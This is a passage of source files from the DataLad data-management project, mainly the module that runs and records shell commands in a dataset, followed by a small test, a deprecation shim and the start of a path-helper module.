The value can also be a glob. [CMD: This\n option can be given more than once. CMD]\"\"\"),\n outputs=Parameter(\n args=(\"-o\", \"--output\"),\n dest=\"outputs\",\n metavar=(\"PATH\"),\n action='append',\n doc=\"\"\"Prepare this relative path to be an output file of the command. A\n value of \".\" means \"run :command:`datalad unlock .`\" (and will fail\n if some content isn't present). For any other value, if the content\n of this file is present, unlock the file. Otherwise, remove it. The\n value can also be a glob. [CMD: This option can be given more than\n once. CMD]\"\"\"),\n expand=Parameter(\n args=(\"--expand\",),\n doc=\"\"\"Expand globs when storing inputs and/or outputs in the\n commit message.\"\"\",\n constraints=EnsureChoice(None, \"inputs\", \"outputs\", \"both\")),\n assume_ready=assume_ready_opt,\n explicit=Parameter(\n args=(\"--explicit\",),\n action=\"store_true\",\n doc=\"\"\"Consider the specification of inputs and outputs to be\n explicit. Don't warn if the repository is dirty, and only save\n modifications to the listed outputs.\"\"\"),\n message=save_message_opt,\n sidecar=Parameter(\n args=('--sidecar',),\n metavar=\"{yes|no}\",\n doc=\"\"\"By default, the configuration variable\n 'datalad.run.record-sidecar' determines whether a record with\n information on a command's execution is placed into a separate\n record file instead of the commit message (default: off). This\n option can be used to override the configured behavior on a\n case-by-case basis. Sidecar files are placed into the dataset's\n '.datalad/runinfo' directory (customizable via the\n 'datalad.run.record-directory' configuration variable).\"\"\",\n constraints=EnsureNone() | EnsureBool()),\n dry_run=Parameter(\n # Leave out common -n short flag to avoid confusion with\n # `containers-run [-n|--container-name]`.\n args=(\"--dry-run\",),\n doc=\"\"\"Do not run the command; just display details about the\n command execution. A value of \"basic\" reports a few important\n details about the execution, including the expanded command and\n expanded inputs and outputs. \"command\" displays the expanded\n command only. Note that input and output globs underneath an\n uninstalled dataset will be left unexpanded because no subdatasets\n will be installed for a dry run.\"\"\",\n constraints=EnsureChoice(None, \"basic\", \"command\")),\n jobs=jobs_opt\n )\n _params_['jobs']._doc += \"\"\"\\\n NOTE: This option can only parallelize input retrieval (get) and output\n recording (save). 
DataLad does NOT parallelize your scripts for you.\n \"\"\"\n\n @staticmethod\n @datasetmethod(name='run')\n @eval_results\n def __call__(\n cmd=None,\n *,\n dataset=None,\n inputs=None,\n outputs=None,\n expand=None,\n assume_ready=None,\n explicit=False,\n message=None,\n sidecar=None,\n dry_run=None,\n jobs=None):\n for r in run_command(cmd, dataset=dataset,\n inputs=inputs, outputs=outputs,\n expand=expand,\n assume_ready=assume_ready,\n explicit=explicit,\n message=message,\n sidecar=sidecar,\n dry_run=dry_run,\n jobs=jobs):\n yield r\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n dry_run = kwargs.get(\"dry_run\")\n if dry_run and \"dry_run_info\" in res:\n if dry_run == \"basic\":\n _display_basic(res)\n elif dry_run == \"command\":\n ui.message(res[\"dry_run_info\"][\"cmd_expanded\"])\n else:\n raise ValueError(f\"Unknown dry-run mode: {dry_run!r}\")\n else:\n if kwargs.get(\"on_failure\") == \"stop\" and \\\n res.get(\"action\") == \"run\" and res.get(\"status\") == \"error\":\n msg_path = res.get(\"msg_path\")\n if msg_path:\n ds_path = res[\"path\"]\n if datalad.get_apimode() == 'python':\n help = f\"\\\"Dataset('{ds_path}').save(path='.', \" \\\n \"recursive=True, message_file='%s')\\\"\"\n else:\n help = \"'datalad save -d . -r -F %s'\"\n lgr.info(\n \"The command had a non-zero exit code. \"\n \"If this is expected, you can save the changes with \"\n f\"{help}\",\n # shorten to the relative path for a more concise\n # message\n Path(msg_path).relative_to(ds_path))\n generic_result_renderer(res)\n\n\ndef _display_basic(res):\n ui.message(ac.color_word(\"Dry run information\", ac.MAGENTA))\n\n def fmt_line(key, value, multiline=False):\n return (\" {key}:{sep}{value}\"\n .format(key=ac.color_word(key, ac.BOLD),\n sep=os.linesep + \" \" if multiline else \" \",\n value=value))\n\n dry_run_info = res[\"dry_run_info\"]\n lines = [fmt_line(\"location\", dry_run_info[\"pwd_full\"])]\n\n # TODO: Inputs and outputs could be pretty long. 
These may be worth\n # truncating.\n inputs = dry_run_info[\"inputs\"]\n if inputs:\n lines.append(fmt_line(\"expanded inputs\", inputs,\n multiline=True))\n outputs = dry_run_info[\"outputs\"]\n if outputs:\n lines.append(fmt_line(\"expanded outputs\", outputs,\n multiline=True))\n\n cmd = res[\"run_info\"][\"cmd\"]\n cmd_expanded = dry_run_info[\"cmd_expanded\"]\n lines.append(fmt_line(\"command\", cmd, multiline=True))\n if cmd != cmd_expanded:\n lines.append(fmt_line(\"expanded command\", cmd_expanded,\n multiline=True))\n\n ui.message(os.linesep.join(lines))\n\n\ndef get_command_pwds(dataset):\n \"\"\"Return the current directory for the dataset.\n\n Parameters\n ----------\n dataset : Dataset\n\n Returns\n -------\n A tuple, where the first item is the absolute path of the pwd and the\n second is the pwd relative to the dataset's path.\n \"\"\"\n # Follow path resolution logic describe in gh-3435.\n if isinstance(dataset, Dataset): # Paths relative to dataset.\n pwd = dataset.path\n rel_pwd = op.curdir\n else: # Paths relative to current directory.\n pwd = getpwd()\n # Pass pwd to get_dataset_root instead of os.path.curdir to handle\n # repos whose leading paths have a symlinked directory (see the\n # TMPDIR=\"/var/tmp/sym link\" test case).\n if not dataset:\n dataset = get_dataset_root(pwd)\n\n if dataset:\n rel_pwd = op.relpath(pwd, dataset)\n else:\n rel_pwd = pwd # and leave handling to caller\n return pwd, rel_pwd\n\n\ndef _dset_arg_kludge(arg):\n if isinstance(arg, Dataset):\n warnings.warn(\"Passing dataset instance is deprecated; \"\n \"pass path as a string instead\",\n DeprecationWarning)\n arg = arg.path\n return arg\n\n\ndef _is_nonexistent_path(result):\n return (result.get(\"action\") == \"get\" and\n result.get(\"status\") == \"impossible\" and\n result.get(\"message\") == \"path does not exist\")\n\n\ndef _install_and_reglob(dset_path, gpaths):\n \"\"\"Install globbed subdatasets and repeat.\n\n Parameters\n ----------\n dset_path : str\n gpaths : GlobbedPaths object\n\n Returns\n -------\n Generator with the results of the `install` calls.\n \"\"\"\n dset_path = _dset_arg_kludge(dset_path)\n\n def glob_dirs():\n return [d for d in map(op.dirname, gpaths.expand(refresh=True))\n # d could be an empty string because there are relative paths.\n if d]\n\n install = Install()\n dirs, dirs_new = [], glob_dirs()\n while dirs_new and dirs != dirs_new:\n for res in install(dataset=dset_path,\n path=dirs_new,\n result_xfm=None,\n result_renderer='disabled',\n return_type='generator',\n on_failure='ignore'):\n if _is_nonexistent_path(res):\n lgr.debug(\"Skipping install of non-existent path: %s\",\n res[\"path\"])\n else:\n yield res\n dirs, dirs_new = dirs_new, glob_dirs()\n\n\ndef prepare_inputs(dset_path, inputs, extra_inputs=None, jobs=None):\n \"\"\"Prepare `inputs` for running a command.\n\n This consists of installing required subdatasets and getting the input\n files.\n\n Parameters\n ----------\n dset_path : str\n inputs : GlobbedPaths object\n extra_inputs : GlobbedPaths object, optional\n\n Returns\n -------\n Generator with the result records.\n \"\"\"\n dset_path = _dset_arg_kludge(dset_path)\n\n gps = list(filter(bool, [inputs, extra_inputs]))\n if gps:\n lgr.info('Making sure inputs are available (this may take some time)')\n\n get = Get()\n for gp in gps:\n for res in _install_and_reglob(dset_path, gp):\n yield res\n if gp.misses:\n ds = Dataset(dset_path)\n for miss in gp.misses:\n yield get_status_dict(\n action=\"run\", ds=ds, status=\"error\",\n 
message=(\"Input did not match existing file: %s\",\n miss))\n yield from get(dataset=dset_path,\n path=gp.expand_strict(),\n on_failure='ignore',\n result_renderer='disabled',\n return_type='generator',\n jobs=jobs)\n\n\ndef _unlock_or_remove(dset_path, paths, remove=False):\n \"\"\"Unlock `paths` if content is present; remove otherwise.\n\n Parameters\n ----------\n dset_path : str\n paths : list of string\n Absolute paths of dataset files.\n remove : bool, optional\n If enabled, always remove instead of performing an availability test.\n\n Returns\n -------\n Generator with result records.\n \"\"\"\n dset_path = _dset_arg_kludge(dset_path)\n\n existing = []\n for path in paths:\n if op.exists(path) or op.lexists(path):\n existing.append(path)\n else:\n # Avoid unlock's warning because output files may not exist in\n # common cases (e.g., when rerunning with --onto).\n lgr.debug(\"Filtered out non-existing path: %s\", path)\n\n if not existing:\n return\n\n to_remove = []\n if remove:\n # when we force-remove, we use status to discover matching content\n # and let unlock's remove fallback handle these results\n to_remove = Status()(\n dataset=dset_path,\n path=existing,\n eval_subdataset_state='commit',\n untracked='no',\n annex='no',\n on_failure=\"ignore\",\n # no rendering here, the relevant results are yielded below\n result_renderer='disabled',\n return_type='generator',\n # we only remove files, no subdatasets or directories\n result_filter=lambda x: x.get('type') in ('file', 'symlink'),\n )\n else:\n # Note: If Unlock() is given a directory (including a subdataset)\n # as a path, files without content present won't be reported, so\n # those cases aren't being covered by the \"remove if not present\"\n # logic below.\n for res in Unlock()(dataset=dset_path,\n path=existing,\n on_failure='ignore',\n result_renderer='disabled',\n return_type='generator'):\n if res[\"status\"] == \"impossible\" and res[\"type\"] == \"file\" \\\n and \"cannot unlock\" in res[\"message\"]:\n to_remove.append(res)\n continue\n yield res\n # Avoid `datalad remove` because it calls git-rm underneath, which will\n # remove leading directories if no other files remain. See gh-5486.\n for res in to_remove:\n try:\n os.unlink(res[\"path\"])\n except OSError as exc:\n ce = CapturedException(exc)\n yield dict(res, action=\"run.remove\", status=\"error\",\n message=(\"Removing file failed: %s\", ce),\n exception=ce)\n else:\n yield dict(res, action=\"run.remove\", status=\"ok\",\n message=\"Removed file\")\n\n\ndef normalize_command(command):\n \"\"\"Convert `command` to the string representation.\n \"\"\"\n if isinstance(command, list):\n command = list(map(ensure_unicode, command))\n if len(command) == 1 and command[0] != \"--\":\n # This is either a quoted compound shell command or a simple\n # one-item command. Pass it as is.\n #\n # FIXME: This covers the predominant command-line case, but, for\n # Python API callers, it means values like [\"./script with spaces\"]\n # requires additional string-like escaping, which is inconsistent\n # with the handling of multi-item lists (and subprocess's\n # handling). Once we have a way to detect \"running from Python API\"\n # (discussed in gh-2986), update this.\n command = command[0]\n else:\n if command and command[0] == \"--\":\n # Strip disambiguation marker. 
Note: \"running from Python API\"\n # FIXME from below applies to this too.\n command = command[1:]\n command = join_cmdline(command)\n else:\n command = ensure_unicode(command)\n return command\n\n\ndef format_command(dset, command, **kwds):\n \"\"\"Plug in placeholders in `command`.\n\n Parameters\n ----------\n dset : Dataset\n command : str or list\n\n `kwds` is passed to the `format` call. `inputs` and `outputs` are converted\n to GlobbedPaths if necessary.\n\n Returns\n -------\n formatted command (str)\n \"\"\"\n command = normalize_command(command)\n sfmt = SequenceFormatter()\n\n for k, v in dset.config.items(\"datalad.run.substitutions\"):\n sub_key = k.replace(\"datalad.run.substitutions.\", \"\")\n if sub_key not in kwds:\n kwds[sub_key] = v\n\n for name in [\"inputs\", \"outputs\"]:\n io_val = kwds.pop(name, None)\n if not isinstance(io_val, GlobbedPaths):\n io_val = GlobbedPaths(io_val, pwd=kwds.get(\"pwd\"))\n kwds[name] = list(map(quote_cmdlinearg, io_val.expand(dot=False)))\n return sfmt.format(command, **kwds)\n\n\ndef _get_substitutions(dset):\n \"\"\"Get substitution mapping\n\n Parameters\n ----------\n dset : Dataset\n Providing the to-be-queried configuration.\n\n Returns\n -------\n dict\n Mapping substitution keys to their values.\n \"\"\"\n return {\n k.replace(\"datalad.run.substitutions.\", \"\"): v\n for k, v in dset.config.items(\"datalad.run.substitutions\")\n }\n\n\ndef _format_iospecs(specs, **kwargs):\n \"\"\"Expand substitutions in specification lists.\n\n The expansion is generally a format() call on each items, using\n the kwargs as substitution mapping. A special case is, however,\n a single-item specification list that exclusively contains a\n plain substitution reference, i.e., ``{subst}``, that matches\n a kwargs-key (minus the brace chars), whose value is a list.\n In this case the entire specification list is substituted for\n the list in kwargs, which is returned as such. This enables\n the replace/re-use sequences, e.g. --inputs '{outputs}'\n\n Parameters\n ----------\n specs: list(str) or None\n Specification items to format.\n **kwargs:\n Placeholder key-value mapping to apply to specification items.\n\n Returns\n -------\n list\n All formatted items.\n \"\"\"\n if not specs:\n return\n elif len(specs) == 1 and specs[0] \\\n and specs[0][0] == '{' and specs[0][-1] == '}' \\\n and isinstance(kwargs.get(specs[0][1:-1]), list):\n return kwargs[specs[0][1:-1]]\n return [\n s.format(**kwargs) for s in specs\n ]\n\n\ndef _execute_command(command, pwd):\n from datalad.cmd import WitlessRunner\n\n exc = None\n cmd_exitcode = None\n runner = WitlessRunner(cwd=pwd)\n try:\n lgr.info(\"== Command start (output follows) =====\")\n runner.run(\n # command is always a string\n command\n )\n except CommandError as e:\n exc = e\n cmd_exitcode = e.code\n lgr.info(\"== Command exit (modification check follows) =====\")\n return cmd_exitcode or 0, exc\n\n\ndef _prep_worktree(ds_path, pwd, globbed,\n assume_ready=None, remove_outputs=False,\n rerun_outputs=None,\n jobs=None):\n \"\"\"\n Yields\n ------\n dict\n Result records\n \"\"\"\n # ATTN: For correct path handling, all dataset commands call should be\n # unbound. They should (1) receive a string dataset argument, (2) receive\n # relative paths, and (3) happen within a chpwd(pwd) context.\n with chpwd(pwd):\n for res in prepare_inputs(\n ds_path,\n [] if assume_ready in [\"inputs\", \"both\"]\n else globbed['inputs'],\n # Ignore --assume-ready for extra_inputs. 
It's an unexposed\n # implementation detail that lets wrappers sneak in inputs.\n extra_inputs=globbed['extra_inputs'],\n jobs=jobs):\n yield res\n\n if assume_ready not in [\"outputs\", \"both\"]:\n if globbed['outputs']:\n for res in _install_and_reglob(\n ds_path, globbed['outputs']):\n yield res\n for res in _unlock_or_remove(\n ds_path,\n globbed['outputs'].expand_strict()\n if not remove_outputs\n # when force-removing, exclude declared inputs\n else set(\n globbed['outputs'].expand_strict()).difference(\n globbed['inputs'].expand_strict()),\n remove=remove_outputs):\n yield res\n\n if rerun_outputs is not None:\n for res in _unlock_or_remove(ds_path, rerun_outputs):\n yield res\n\n\ndef _create_record(run_info, sidecar_flag, ds):\n \"\"\"\n Returns\n -------\n str or None, str or None\n The first value is either the full run record in JSON serialized form,\n or content-based ID hash, if the record was written to a file. In that\n latter case, the second value is the path to the record sidecar file,\n or None otherwise.\n \"\"\"\n record = json.dumps(run_info, indent=1, sort_keys=True, ensure_ascii=False)\n if sidecar_flag is None:\n use_sidecar = ds.config.get(\n 'datalad.run.record-sidecar', default=False)\n use_sidecar = anything2bool(use_sidecar)\n else:\n use_sidecar = sidecar_flag\n\n record_id = None\n record_path = None\n if use_sidecar:\n # record ID is hash of record itself\n from hashlib import md5\n record_id = md5(record.encode('utf-8')).hexdigest() # nosec\n record_dir = ds.config.get(\n 'datalad.run.record-directory',\n default=op.join('.datalad', 'runinfo'))\n record_path = ds.pathobj / record_dir / record_id\n if not op.lexists(record_path):\n # go for compression, even for minimal records not much difference,\n # despite offset cost\n # wrap in list -- there is just one record\n dump2stream([run_info], record_path, compressed=True)\n return record_id or record, record_path\n\n\ndef run_command(cmd, dataset=None, inputs=None, outputs=None, expand=None,\n assume_ready=None, explicit=False, message=None, sidecar=None,\n dry_run=False, jobs=None,\n extra_info=None,\n rerun_info=None,\n extra_inputs=None,\n rerun_outputs=None,\n inject=False,\n parametric_record=False,\n remove_outputs=False,\n skip_dirtycheck=False,\n yield_expanded=None):\n \"\"\"Run `cmd` in `dataset` and record the results.\n\n `Run.__call__` is a simple wrapper over this function. Aside from backward\n compatibility kludges, the only difference is that `Run.__call__` doesn't\n expose all the parameters of this function. The unexposed parameters are\n listed below.\n\n Parameters\n ----------\n extra_info : dict, optional\n Additional information to dump with the json run record. Any value\n given here will take precedence over the standard run key. Warning: To\n avoid collisions with future keys added by `run`, callers should try to\n use fairly specific key names and are encouraged to nest fields under a\n top-level \"namespace\" key (e.g., the project or extension name).\n rerun_info : dict, optional\n Record from a previous run. This is used internally by `rerun`.\n extra_inputs : list, optional\n Inputs to use in addition to those specified by `inputs`. Unlike\n `inputs`, these will not be injected into the {inputs} format field.\n rerun_outputs : list, optional\n Outputs, in addition to those in `outputs`, determined automatically\n from a previous run. 
This is used internally by `rerun`.\n inject : bool, optional\n Record results as if a command was run, skipping input and output\n preparation and command execution. In this mode, the caller is\n responsible for ensuring that the state of the working tree is\n appropriate for recording the command's results.\n parametric_record : bool, optional\n If enabled, substitution placeholders in the input/output specification\n are retained verbatim in the run record. This enables using a single\n run record for multiple different re-runs via individual\n parametrization.\n remove_outputs : bool, optional\n If enabled, all declared outputs will be removed prior command\n execution, except for paths that are also declared inputs.\n skip_dirtycheck : bool, optional\n If enabled, a check for dataset modifications is unconditionally\n disabled, even if other parameters would indicate otherwise. This\n can be used by callers that already performed analog verififcations\n to avoid duplicate processing.\n yield_expanded : {'inputs', 'outputs', 'both'}, optional\n Include a 'expanded_%s' item into the run result with the exanded list\n of paths matching the inputs and/or outputs specification,\n respectively.\n\n\n Yields\n ------\n Result records for the run.\n \"\"\"\n if not cmd:\n lgr.warning(\"No command given\")\n return\n\n specs = {\n k: ensure_list(v) for k, v in (('inputs', inputs),\n ('extra_inputs', extra_inputs),\n ('outputs', outputs))\n }\n\n rel_pwd = rerun_info.get('pwd') if rerun_info else None\n if rel_pwd and dataset:\n # recording is relative to the dataset\n pwd = op.normpath(op.join(dataset.path, rel_pwd))\n rel_pwd = op.relpath(pwd, dataset.path)\n else:\n pwd, rel_pwd = get_command_pwds(dataset)\n\n ds = require_dataset(\n dataset, check_installed=True,\n purpose='track command outcomes')\n ds_path = ds.path\n\n lgr.debug('tracking command output underneath %s', ds)\n\n # skip for callers that already take care of this\n if not (skip_dirtycheck or rerun_info or inject):\n # For explicit=True, we probably want to check whether any inputs have\n # modifications. 
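# --- Hypothetical usage sketch (not part of the original module) ---
# The docstring above lists parameters that Run.__call__ does not expose,
# such as `extra_inputs`. A wrapper command could call run_command()
# directly to sneak in additional dependencies. The dataset location, file
# names and command below are invented, and an installed dataset containing
# these files is assumed.
from datalad.core.local.run import run_command
from datalad.distribution.dataset import Dataset

ds = Dataset("/tmp/myds")
for res in run_command(
        "python code/analyze.py {inputs} > results.txt",
        dataset=ds,
        inputs=["data/raw.csv"],
        extra_inputs=["code/analyze.py"],  # retrieved, but kept out of {inputs}
        outputs=["results.txt"],
        explicit=True):
    print(res.get("action"), res["status"])
# --- end of hypothetical sketch ---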
However, we can't just do is_dirty(..., path=inputs)\n # because we need to consider subdatasets and untracked files.\n # MIH: is_dirty() is gone, but status() can do all of the above!\n if not explicit and ds.repo.dirty:\n yield get_status_dict(\n 'run',\n ds=ds,\n status='impossible',\n message=(\n 'clean dataset required to detect changes from command; '\n 'use `datalad status` to inspect unsaved changes'))\n return\n\n # everything below expects the string-form of the command\n cmd = normalize_command(cmd)\n # pull substitutions from config\n cmd_fmt_kwargs = _get_substitutions(ds)\n # amend with unexpanded dependency/output specifications, which might\n # themselves contain substitution placeholder\n for n, val in specs.items():\n if val:\n cmd_fmt_kwargs[n] = val\n\n # apply the substitution to the IO specs\n expanded_specs = {\n k: _format_iospecs(v, **cmd_fmt_kwargs) for k, v in specs.items()\n }\n # try-expect to catch expansion issues in _format_iospecs() which\n # expands placeholders in dependency/output specification before\n # globbing\n try:\n globbed = {\n k: GlobbedPaths(\n v,\n pwd=pwd,\n expand=expand in (\n # extra_inputs follow same expansion rules as `inputs`.\n [\"both\"] + (['outputs'] if k == 'outputs' else ['inputs'])\n ))\n for k, v in expanded_specs.items()\n }\n except KeyError as exc:\n yield get_status_dict(\n 'run',\n ds=ds,\n status='impossible',\n message=(\n 'input/output specification has an unrecognized '\n 'placeholder: %s', exc))\n return\n\n if not (inject or dry_run):\n yield from _prep_worktree(\n ds_path, pwd, globbed,\n assume_ready=assume_ready,\n remove_outputs=remove_outputs,\n rerun_outputs=rerun_outputs,\n jobs=None)\n else:\n # If an inject=True caller wants to override the exit code, they can do\n # so in extra_info.\n cmd_exitcode = 0\n exc = None\n\n # prepare command formatting by extending the set of configurable\n # substitutions with the essential components\n cmd_fmt_kwargs.update(\n pwd=pwd,\n dspath=ds_path,\n # Check if the command contains \"{tmpdir}\" to avoid creating an\n # unnecessary temporary directory in most but not all cases.\n tmpdir=mkdtemp(prefix=\"datalad-run-\") if \"{tmpdir}\" in cmd else \"\",\n # the following override any matching non-glob substitution\n # values\n inputs=globbed['inputs'],\n outputs=globbed['outputs'],\n )\n try:\n cmd_expanded = format_command(ds, cmd, **cmd_fmt_kwargs)\n except KeyError as exc:\n yield get_status_dict(\n 'run',\n ds=ds,\n status='impossible',\n message=('command has an unrecognized placeholder: %s',\n exc))\n return\n\n # amend commit message with `run` info:\n # - pwd if inside the dataset\n # - the command itself\n # - exit code of the command\n run_info = {\n 'cmd': cmd,\n # rerun does not handle any prop being None, hence all\n # the `or/else []`\n 'chain': rerun_info[\"chain\"] if rerun_info else [],\n }\n # for all following we need to make sure that the raw\n # specifications, incl. 
any placeholders make it into\n # the run-record to enable \"parametric\" re-runs\n # ...except when expansion was requested\n for k, v in specs.items():\n run_info[k] = globbed[k].paths \\\n if expand in [\"both\"] + (\n ['outputs'] if k == 'outputs' else ['inputs']) \\\n else (v if parametric_record\n else expanded_specs[k]) or []\n\n if rel_pwd is not None:\n # only when inside the dataset to not leak information\n run_info['pwd'] = rel_pwd\n if ds.id:\n run_info[\"dsid\"] = ds.id\n if extra_info:\n run_info.update(extra_info)\n\n if dry_run:\n yield get_status_dict(\n \"run [dry-run]\", ds=ds, status=\"ok\", message=\"Dry run\",\n run_info=run_info,\n dry_run_info=dict(\n cmd_expanded=cmd_expanded,\n pwd_full=pwd,\n **{k: globbed[k].expand() for k in ('inputs', 'outputs')},\n )\n )\n return\n\n if not inject:\n cmd_exitcode, exc = _execute_command(cmd_expanded, pwd)\n run_info['exit'] = cmd_exitcode\n\n # Re-glob to capture any new outputs.\n #\n # TODO: If a warning or error is desired when an --output pattern doesn't\n # have a match, this would be the spot to do it.\n if explicit or expand in [\"outputs\", \"both\"]:\n # also for explicit mode we have to re-glob to be able to save all\n # matching outputs\n globbed['outputs'].expand(refresh=True)\n if expand in [\"outputs\", \"both\"]:\n run_info[\"outputs\"] = globbed['outputs'].paths\n\n # create the run record, either as a string, or written to a file\n # depending on the config/request\n record, record_path = _create_record(run_info, sidecar, ds)\n\n # abbreviate version of the command for illustrative purposes\n cmd_shorty = _format_cmd_shorty(cmd_expanded)\n\n # compose commit message\n msg = u\"\"\"\\\n[DATALAD RUNCMD] {}\n\n=== Do not change lines below ===\n{}\n^^^ Do not change lines above ^^^\n\"\"\"\n msg = msg.format(\n message if message is not None else cmd_shorty,\n '\"{}\"'.format(record) if record_path else record)\n\n outputs_to_save = globbed['outputs'].expand_strict() if explicit else None\n if outputs_to_save is not None and record_path:\n outputs_to_save.append(record_path)\n do_save = outputs_to_save is None or outputs_to_save\n msg_path = None\n if not rerun_info and cmd_exitcode:\n if do_save:\n repo = ds.repo\n # must record path to be relative to ds.path to meet\n # result record semantics (think symlink resolution, etc)\n msg_path = ds.pathobj / \\\n repo.dot_git.relative_to(repo.pathobj) / \"COMMIT_EDITMSG\"\n msg_path.write_text(msg)\n\n expected_exit = rerun_info.get(\"exit\", 0) if rerun_info else None\n if cmd_exitcode and expected_exit != cmd_exitcode:\n status = \"error\"\n else:\n status = \"ok\"\n\n run_result = get_status_dict(\n \"run\", ds=ds,\n status=status,\n # use the abbrev. command as the message to give immediate clarity what\n # completed/errors in the generic result rendering\n message=cmd_shorty,\n run_info=run_info,\n # use the same key that `get_status_dict()` would/will use\n # to record the exit code in case of an exception\n exit_code=cmd_exitcode,\n exception=exc,\n # Provide msg_path and explicit outputs so that, under\n # on_failure='stop', callers can react to a failure and then call\n # save().\n msg_path=str(msg_path) if msg_path else None,\n )\n if record_path:\n # we the record is in a sidecar file, report its ID\n run_result['record_id'] = record\n for s in ('inputs', 'outputs'):\n # this enables callers to further inspect the outputs without\n # performing globbing again. 
Together with remove_outputs=True\n # these would be guaranteed to be the outcome of the executed\n # command. in contrast to `outputs_to_save` this does not\n # include aux file, such as the run record sidecar file.\n # calling .expand_strict() again is largely reporting cached\n # information\n # (format: relative paths)\n if yield_expanded in (s, 'both'):\n run_result[f'expanded_{s}'] = globbed[s].expand_strict()\n yield run_result\n\n if do_save:\n with chpwd(pwd):\n for r in Save.__call__(\n dataset=ds_path,\n path=outputs_to_save,\n recursive=True,\n message=msg,\n jobs=jobs,\n return_type='generator',\n # we want this command and its parameterization to be in full\n # control about the rendering of results, hence we must turn\n # off internal rendering\n result_renderer='disabled',\n on_failure='ignore'):\n yield r\n" }, { "alpha_fraction": 0.574449360370636, "alphanum_fraction": 0.5867841243743896, "avg_line_length": 31.898550033569336, "blob_id": "304cea694168a1516c9fc048a1089c762c69de9b", "content_id": "12ac82223624e3a15b8864e66c829341fa6a31c7", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2270, "license_type": "permissive", "max_line_length": 100, "num_lines": 69, "path": "/datalad/local/tests/test_no_annex.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test no_annex\"\"\"\n\n\nfrom os.path import join as opj\n\nfrom datalad.api import (\n create,\n no_annex,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_repo_status,\n create_tree,\n eq_,\n known_failure_githubci_win,\n with_tempfile,\n)\nfrom datalad.utils import Path\n\n\n@known_failure_githubci_win\n@with_tempfile(mkdir=True)\ndef test_no_annex(path=None):\n ds = create(path)\n assert_repo_status(ds.path)\n create_tree(\n ds.path,\n {'code': {\n 'inannex': 'content',\n 'notinannex': 'othercontent'},\n 'README': 'please'})\n # add inannex pre configuration\n ds.save(opj('code', 'inannex'))\n no_annex(pattern=['code/**', 'README'], dataset=ds.path)\n\n inannex = (ds.pathobj / 'code' / 'inannex')\n\n # add inannex and README post configuration\n ds.save([opj('code', 'notinannex'), 'README'])\n\n repo = ds.repo\n try:\n assert_repo_status(ds.path)\n except AssertionError:\n # If on an adjusted branch and notinannex's mtime is as recent or newer\n # than .git/index's, the clean filter runs on it when save() is called.\n # This leads to a racy failure until after git-annex's 424bef6b6\n # (smudge: check for known annexed inodes before checking\n # annex.largefiles, 2021-05-03).\n #\n # https://git-annex.branchable.com/forum/one-off_unlocked_annex_files_that_go_against_large/\n if repo.is_managed_branch() and repo.git_annex_version <= \"8.20210428\":\n assert_repo_status(ds.path, modified=[inannex])\n raise SkipTest(\"Known bug fixed in git-annex\")\n raise\n\n # one is annex'ed, the other is not, despite no change in add call\n # importantly, also .gitattribute is not annexed\n eq_([opj('code', 'inannex')],\n [str(Path(p)) for p in 
repo.get_annexed_files()])\n" }, { "alpha_fraction": 0.7423076629638672, "alphanum_fraction": 0.7423076629638672, "avg_line_length": 27.88888931274414, "blob_id": "44b0b42cf2f5f096cfaa2b3f83759da4b6af4d29", "content_id": "b482b9840139b179c1f01496a25ea2a6f583f435", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "permissive", "max_line_length": 75, "num_lines": 9, "path": "/datalad/plugin/addurls.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.addurls is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.addurls instead.\",\n DeprecationWarning)\n\nfrom datalad.local.addurls import *\n" }, { "alpha_fraction": 0.6200579404830933, "alphanum_fraction": 0.6220207214355469, "avg_line_length": 36.93971633911133, "blob_id": "c3828a6e9e8384150ddbd5983b47a1033f665fde", "content_id": "d5760c2d9211104051b8f2621b99d77dadea0a76", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10699, "license_type": "permissive", "max_line_length": 124, "num_lines": 282, "path": "/datalad/support/path.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helper functionality and overloads for paths treatment\n\nOne of the reasons is also to robustify operation with unicode filenames\n\"\"\"\nfrom __future__ import annotations\n\n# TODO: RF and move all paths related functions from datalad.utils in here\nimport os\nimport os.path as op\n# to not pollute API importing as _\nfrom collections import defaultdict as _defaultdict\nfrom collections.abc import (\n Iterable,\n Iterator,\n)\nfrom functools import wraps\nfrom itertools import dropwhile\nfrom pathlib import (\n Path,\n PurePosixPath,\n)\n\nfrom ..utils import (\n ensure_bytes,\n getpwd,\n)\n\n\ndef _get_unicode_robust_version(f):\n\n @wraps(f)\n def wrapped(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except UnicodeEncodeError:\n return f(ensure_bytes(*args, **kwargs))\n doc = getattr(f, '__doc__', None)\n # adjust only if __doc__ is not completely absent (None)\n if doc is not None:\n wrapped.__doc__ = doc + \\\n \"\\n\\nThis wrapper around original function would encode forcefully \" \\\n \"to utf-8 if initial invocation fails\"\n return wrapped\n\n\nabspath = op.abspath\nbasename = op.basename\ncurdir = op.curdir\ndirname = op.dirname\nexists = _get_unicode_robust_version(op.exists)\nisdir = _get_unicode_robust_version(op.isdir)\nisabs = 